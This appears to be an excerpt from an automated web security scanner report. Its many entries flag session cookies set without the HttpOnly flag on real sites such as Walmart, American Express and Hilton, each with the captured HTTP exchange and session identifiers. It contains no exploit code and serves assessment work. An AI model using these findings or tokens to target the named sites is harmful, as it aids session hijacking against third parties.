HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:09:17 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.7 Set-Cookie: SESSc75490b6e05df4b955c54eec3097373b=o8ot6jt3lo29pi8jckb7f0fjc2; expires=Tue, 01-Mar-2011 01:42:37 GMT; path=/; domain=.pdfforge.org Last-Modified: Sat, 05 Feb 2011 22:05:03 GMT ETag: "ff0ffe33d43c31cea41ae173d1fb80bd" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <me ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 22:09:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=16197155;expires=Mon, 28-Jan-2041 22:09:24 GMT;path=/
Set-Cookie: CFTOKEN=66704047;expires=Mon, 28-Jan-2041 22:09:24 GMT;path=/
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerIMS-6=773065226.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pusha.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support/HP-W8000-Desktops-manual/id/3823ag123/t/2 HTTP/1.1 Host: www.retrevo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently
Set-Cookie: JSESSIONID=7C9CF70A5240CFB9892A007BA287025C; Path=/
Set-Cookie: s_refType=; Domain=.retrevo.com; Expires=Sat, 05-Feb-2011 22:09:28 GMT; Path=/
Set-Cookie: u=4d9f3b67934f473891bc273394b24dad; Domain=.retrevo.com; Expires=Mon, 28-Jan-2041 22:09:27 GMT; Path=/
Set-Cookie: us=4d9f3b67934f473891bc273394b24dad; Path=/
Set-Cookie: ss=65665; Path=/
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT"
Location: /support/HP-W8000-Desktops-manual/id/3823ag123/t/2/
Content-Length: 0
Date: Sat, 05 Feb 2011 22:09:27 GMT
Server: Apache-Coyote/1.1
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacypolicy.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 15320 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACARTTB=JABALOKCHIPGHGJAFOOIMGKB; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reprints/order.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 44530 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACARTTB=MHBALOKCEGMPNINNPNAKBMPM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SLACK Incorporated Periodicals Division</title> <STYLE type="text/css"> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subscribe/newsubs/atshcstep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2544 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:47 GMT Set-Cookie: ASPSESSIONIDCACARTTB=KEBALOKCOFGEPEJFNBJCPGGJ; path=/ Cache-control: no-cache
<html> <head> <title>Athletic Training & Sports Health Care Subscription</title> </head> <style> a,body,td, p, blockquote, H5 { font-family: arial, helvetica, sans-serif; font-size:12px; ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subscribe/newsubs/otistep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2526 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:43 GMT Set-Cookie: ASPSESSIONIDCACARTTB=JBBALOKCCLGHONAJLBLPKHGK; path=/ Cache-control: no-cache
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/s/Tools/ HTTP/1.1 Host: www.smartertechnology.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=gq30qat19nu7cp87h2ahjp4ak6; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cave/narc.php?u=/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw&r=http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg&a=Adwords_Unix&cid= HTTP/1.1
Host: www.splunk.com
Proxy-Connection: keep-alive
Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567; Enabled=true
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.startaid.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Online Bookmarks and Favorites - StartA ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=oal2pj01ul0o7c2hngqqi8gu33; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.stumpedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 18:12:57 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.17 Set-Cookie: PHPSESSID=oal2pj01ul0o7c2hngqqi8gu33; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 14654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php/view HTTP/1.1 Host: www.sulit.com.ph Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 05 Feb 2011 22:19:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: SESSION_ID=irtoo98lni0bfkq9vmg49fn8t3; path=/; domain=.sulit.com.ph Location: http://www.sulit.com.ph/index.php/page+not+found Content-Length: 0
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.symbaloo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:15:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: JSESSIONID=F657FA86143ED37B3FFB0840845C3ADF; Path=/
Accept-Encoding: gzip,deflate
Set-Cookie: hasvisited=true; Expires=Thu, 07-Apr-2011 16:15:57 GMT; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 55620
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="EN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.tarifcheck24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 16:15:58 GMT Server: Apache Set-Cookie: PHPSESSID=d96a2f7e678a2798428d897282afc145; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.tarifcheck24.com/d96a2f7e678a2798428d897282afc145/ Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 0
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.technotizie.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.usbjd.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 22:21:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2725183;expires=Mon, 28-Jan-2041 22:21:38 GMT;path=/
Set-Cookie: CFTOKEN=11047330;expires=Mon, 28-Jan-2041 22:21:38 GMT;path=/
Set-Cookie: JSESSIONID=f03049975b529aec19d61d691f7b301a1652;path=/
Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.viadeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 303 Voir Autre
Date: Sun, 06 Feb 2011 16:16:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=3B4ECBE6DEBEC0E4A014395022499777.tomcat8; Path=/
P3P: policyref="http://www.viadeo.com/w3c/p3p.xml",CP="ALL DSP COR DEVa TAIa OUR BUS UNI"
Location: /en/connexion/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: Coyote-2-a030164=a040108:0; path=/
Accept-Ranges: bytes
Cache-Control: private, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Length: 13
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.vibrantmedia.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35912 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQCCTAQAD=DJOEDIPCFAMNFFGAJPMFFPIK; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 16:16:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Vibrant - The Leaders of Contex ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/board.asp HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: maintab=tcontent2; ASPSESSIONIDQADSARBD=AKAGFMCCECLPJIFLFOEMFLCL;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 34133 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQCCTAQAD=HJOEDIPCILHJIDAFPKHHLCEA; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 16:16:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Vibrant Board of Directors</tit ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/index.asp HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: maintab=tcontent2; ASPSESSIONIDQADSARBD=AKAGFMCCECLPJIFLFOEMFLCL;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 30183 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQCCTAQAD=PJOEDIPCIHEHAPPCDPMEOBPI; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 16:16:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>About Vibrant</title> <meta ht ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /whatisIntelliTXT.asp HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 92116 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQADSARBD=DCOFFMCCFPNFLDGDLGJAJMGA; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:20:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <titl ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.walmart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head> <title> - Walmart</title> <link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.webnews.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wechseln.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Found Set-Cookie: rs_session=c85c671ecf8776c8ec6ef8de3b42eacb; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.wechseln.de/4dbe2d9463a0eee85e2ad2c92c536101/ Content-type: text/html Content-Length: 0 Connection: close Date: Sun, 06 Feb 2011 16:16:17 GMT Server: w4
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /widget/bookmarks-kledyde HTTP/1.1 Host: www.widgetbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 06 Feb 2011 16:16:18 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=B384C80E93F9283766F9CE859A3180E5; Path=/, node=1027; path=/ Content-Language: en-US Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.xerpi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 16:16:21 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8l DAV/2 Phusion_Passenger/3.0.2 X-Powered-By: Cache-Control: no-cache Set-Cookie: _xerpi3_session_id=fe6ebee29506267afbba15fe0a34d40e; path=/ Location: http://www.xerpi.com/account/login Content-Length: 100 Status: 302 Found Connection: close Content-Type: text/html; charset=utf-8
<html><body>You are being <a href="http://www.xerpi.com/account/login">redirected</a>.</body></html>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en_US/hi/customersupport/site-usage.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en_US/hi/index.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789?inav=menu_cards_sbc_comparecards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:41 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944501386119; path=/; expires=Tue, 09-Feb-16 22:21:41 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000q3QZbDYOcyvtP0PZminOCss:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 200661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:44 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944504607994; path=/; expires=Tue, 09-Feb-16 22:21:44 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000kscO5hdpunXSAOCMFtkSRfr:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/find-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:35 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944495304108; path=/; expires=Tue, 09-Feb-16 22:21:35 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000JTfdlyvElahRUmUBPW_Sr5S:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 83384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/see-all-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:42 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944502510060; path=/; expires=Tue, 09-Feb-16 22:21:42 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000yq-Xh-WxMu4vUVCexozgN5B:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /getthecard/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:27 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944487071298; path=/; expires=Tue, 09-Feb-16 22:21:27 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000rksCcDlHmzQipsUe7BzBjnC:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /getthecard/home?sj_tabToOpen=1&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:23 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944483932373; path=/; expires=Tue, 09-Feb-16 22:21:23 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000oFplttRUbELe348jm0hGGKR:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MobileWeb/index.jsp HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944526576342; path=/; expires=Tue, 09-Feb-16 22:22:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0001PGzoPxDqqpRWVuPalmTJrf8:11m1380s8;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 33070
